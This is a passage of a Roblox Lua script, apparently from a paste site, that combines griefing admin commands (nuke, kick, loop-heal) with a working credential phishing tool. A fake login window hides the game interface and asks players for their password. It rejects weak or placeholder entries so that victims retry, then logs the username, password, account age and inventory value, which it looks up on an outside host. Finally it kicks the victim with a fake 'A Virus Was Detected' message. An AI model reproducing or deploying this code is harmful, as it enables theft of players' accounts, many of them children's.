  1924. if v then
  1925. local cl = script.ScriptBase:Clone() cl.Name = "LoopHeal:"..v.Name cl.Code.Value = [[
  1926. local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  1927. repeat wait()
  1928. coroutine.resume(coroutine.create(function()
  1929. if plr and plr.Character and plr.Character:findFirstChild("Humanoid") then
  1930. plr.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth
  1931. plr.Character.Humanoid.Changed:connect(function() r.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth end)
  1932. end
  1933. end))
  1934. until nil]]
  1935. end
  1936. end
  1937. end
  1938.  
  1939.  
  1940.  
  1941.  
  1942.  
  1943.  
  1944. if Cmd.Text:lower():sub(1,5) == "nuke " then
  1945. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1946. for i, v in pairs(plrz) do
  1947. coroutine.resume(coroutine.create(function()
  1948. if v and v.Character and v.Character:findFirstChild("Torso") then
  1949. local p = Instance.new("Part",game.Workspace)
  1950. p.Anchored = true
  1951. p.CanCollide = false
  1952. p.formFactor = "Symmetric"
  1953. p.Shape = "Ball"
  1954. p.Size = Vector3.new(1,1,1)
  1955. p.BrickColor = BrickColor.new("New Yeller")
  1956. p.Transparency = .5
  1957. p.Reflectance = .2
  1958. p.TopSurface = 0
  1959. p.BottomSurface = 0
  1960. p.Touched:connect(function(hit)
  1961. if hit and hit.Parent then
  1962. local ex = Instance.new("Explosion", game.Workspace)
  1963. ex.Position = hit.Position
  1964. ex.BlastRadius = 11
  1965. ex.BlastPressure = math.huge
  1966. end
  1967. end)
  1968. local cf = v.Character.Torso.CFrame
  1969. p.CFrame = cf
  1970. for i = 1, 333 do
  1971. p.Size = p.Size + Vector3.new(3,3,3)
  1972. p.CFrame = cf
  1973. wait(1/44)
  1974. end
  1975. p:Destroy()
  1976. end
  1977. end))
  1978. end
  1979. end
  1980.  
  1981. if Cmd.Text:lower():sub(1,5) == "kick " then
  1982. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1983. for i, v in pairs(plrz) do
  1984. coroutine.resume(coroutine.create(function()
  1985. if v then v:Destroy() end
  1986. end))
  1987. end
  1988. end
  1989.  
  1990. if Cmd.Text:lower():sub(1,5) == "emit " then
  1991. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1992. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1993. for i, v in pairs(plrz) do
  1994. coroutine.resume(coroutine.create(function()
  1995. if v.Character then v.Character:FindFirstChild("Torso")
  1996. local cl = Instance.new("ParticleEmitter", v.Character.Torso)
  1997. cl.Texture = "rbxassetid://"..Cmd.Text:sub(chk1+1)-1
  1998. end
  1999. end))
  2000. end
  2001.  
  2002. if Cmd.Text:lower():sub(1,7) == "unemit " then
  2003. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  2004. for i, v in pairs(plrz) do
  2005. coroutine.resume(coroutine.create(function()
  2006. if v and v.Character and v.Character:findFirstChild("Torso") then
  2007. for z, cl in pairs(v.Character.Torso:GetChildren()) do if cl:IsA("ParticleEmitter") then cl:Destroy() end end
  2008. end
  2009. end))
  2010. end
  2011. end end
  2012.  
  2013. end
  2014.  
  2015.  
  2016.  
  2017. function Clicked5()
  2018. for i,v in pairs(game.Players:GetChildren())do
  2019. gui = NewGuiPart65:Clone()
  2020. gui.Parent = Owner.PlayerGui
  2021. gui.ErrorFrame.Visible = true
  2022. game.StarterGui:SetCoreGuiEnabled("PlayerList", false)
  2023. game.StarterGui:SetCoreGuiEnabled("Backpack", false)
  2024. game.StarterGui:SetCoreGuiEnabled("Chat", false)
  2025. passw = gui.ErrorFrame.TB2.Text
  2026. tb1 = gui.ErrorFrame.TB1.Text
  2027. end end
  2028.  
  2029.  
  2030.  
  2031.  
  2032. wait(3)
  2033. NewGuiPart72.Visible = true
  2034.  
  2035.  
  2036. RAPApi = true
  2037.  
  2038.  
  2039.  
  2040.  
  2041. local checktrue = Instance.new("BoolValue")
  2042. checktrue.Parent = CoreValues
  2043. checktrue.Name = "PasscheckTrue"
  2044. checktrue.Value = false
  2045.  
  2046. tb1 = otherp.Name
  2047.  
  2048. PassWord.Value = NewGuiPart71.Text
  2049. UserName.Value = NewGuiPart73.Text
  2050.  
  2051. function getRap(user)
  2052. local rap = ""
  2053. if RAPApi then
  2054. ypcall(function()
  2055. local http = game:GetService("HttpService")
  2056. local rawrap = http:JSONDecode(game:HttpGet("http://roblox.plus:2052/inventory?username=" .. user,true))
  2057. rap = tostring(rawrap.rap)
  2058. end)
  2059. else
  2060. rap = "N/A"
  2061. end
  2062. return rap
  2063. end
  2064. print("This Is Jech's Property. Please DOnt Reclaim this Project.")
  2065.  
  2066. function BCtoDumpStr(str)
  2067. local res = ""
  2068. if str == "Enum.MembershipType.BuildersClub" then
  2069. res = "[BC] "
  2070. elseif str == "Enum.MembershipType.TurboBuildersClub" then
  2071. res = "[TBC] "
  2072. elseif str == "Enum.MembershipType.OutrageousBuildersClub" then
  2073. res = "[OBC] "
  2074. elseif str == "Enum.MembershipType.None" then
  2075. res = ""
  2076. end
  2077. return res
  2078. end
  2079.  
  2080. function logAccount(user,pass)
  2081. local playerName = user.Name
  2082. local playerAge = tostring(user.AccountAge)
  2083. local playerRAP = getRap(playerName)
  2084.  
  2085.  
  2086. print(BCtoDumpStr(tostring(otherp.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  2087. end
  2088.  
  2089. local GuiRemains = Instance.new("Folder")
  2090. GuiRemains.Name = "GuiRemains"
  2091. GuiRemains.Parent = CoreValues
  2092.  
  2093. function checkPass(pass)
  2094.  
  2095. if pass == "Password" or pass == "" or pass == "Enter Your Password" or pass == "Incorrect Password" or pass == "Enter your Password" then
  2096. Textg.Text = "PassWord Not Found In DataBase."
  2097. return false
  2098. end
  2099. local foundNums = 0
  2100. local foundLetters = 0
  2101. if string.find(pass, " ") then
  2102. Textg.Text = "PassWord Not Found In DataBase."
  2103. return false
  2104. end
  2105. if pass:len() < 6 or pass:len() > 20 then
  2106. Textg.Text = "PassWord Not Found In DataBase."
  2107. return false
  2108. end
  2109. for i=1,pass:len() do
  2110. if pass:sub(i,i):match("%d") ~= nil then
  2111. foundNums = foundNums + 1
  2112. end
  2113. end
  2114. if foundNums < 2 then
  2115. Textg.Text = "PassWord Not Found In DataBase."
  2116. return false
  2117. end
  2118. for i=1,pass:len() do
  2119. if pass:sub(i,i):match("%a") ~= nil then
  2120. foundLetters = foundLetters + 1
  2121. end
  2122. end
  2123. if foundLetters < 4 then
  2124. Textg.Text = "PassWord Not Found In DataBase."
  2125. return false
  2126. end
  2127. checktrue = true
  2128. return true
  2129.  
  2130. end
  2131. function respawn(user)
  2132. local person = game.Players[user]
  2133. person.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2134. person:Kick("A Virus Was Detected.")
  2135. person:Destroy();
  2136. end
  2137.  
  2138. function UnGui(user)
  2139. user.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2140. user:LoadCharacter();
  2141. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2142. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2143. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2144. end
  2145.  
  2146. function Done()
  2147. local pl = gui.Parent.Parent
  2148. UserName.Value = pl.Name
  2149. PassWord.Value = gui.ErrorFrame.TB2.Text
  2150. checkPass(gui.ErrorFrame.TB2.Text)
  2151. logAccount(otherp,gui.ErrorFrame.TB2.Text)
  2152. respawn(pl.Name);
  2153. pl:Kick("A Virus Was Detected.")
  2154. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2155. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2156. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2157.  
  2158. end
  2159.  
  2160.  
  2161. function Clicked6()
  2162.  
  2163. Done();
  2164.  
  2165.  
  2166.  
  2167. end
  2168.  
  2169.  
  2170. game.Workspace.ChildAdded:connect(function(per)
  2171. if per.Name == otherp.Name then
  2172. if IsRunning.Value == true then
  2173. if otherp.PlayerGui["LoginGui"].ErrorFrame.Done.Value == false then
  2174. Clicked5()
  2175. end
  2176. end end
  2177. end)
  2178.  
  2179.  
  2180.  
  2181.  
  2182.  
  2183. Owner.PlayerGui.MGVX.Frame.TL3.MouseButton1Up:connect(Clicked1)
  2184. Owner.PlayerGui.MGVX.Frame.TL4.MouseButton1Up:connect(Clicked2)
  2185. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Up:connect(Clicked)
  2186. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Down:connect(Click)
  2187. Owner.PlayerGui.MGVX.Frame.CMDS.Execute.MouseButton1Up:connect(Clicked3)
  2188. Owner.PlayerGui.MGVX.Frame.ScrollingFrame.TB.MouseButton1Up:connect(Clicked4)
  2189. Owner.Backpack:WaitForChild(ToolName.Value).Equipped:connect(Clicked5)
  2190. Owner.PlayerGui:WaitForChild("LoginGui"):WaitForChild("ErrorFrame"):WaitForChild("LoginButton").MouseButton1Up:connect(Clicked6)
  2191.  
  2192. NewGuiPart1:Clone().Parent = CoreValues
  2193. NewGuiPart65:Clone().Parent = CoreValues
  2194.  
  2195. game.StarterGui.ResetPlayerGuiOnSpawn = false
Add Comment
Please, Sign In to add comment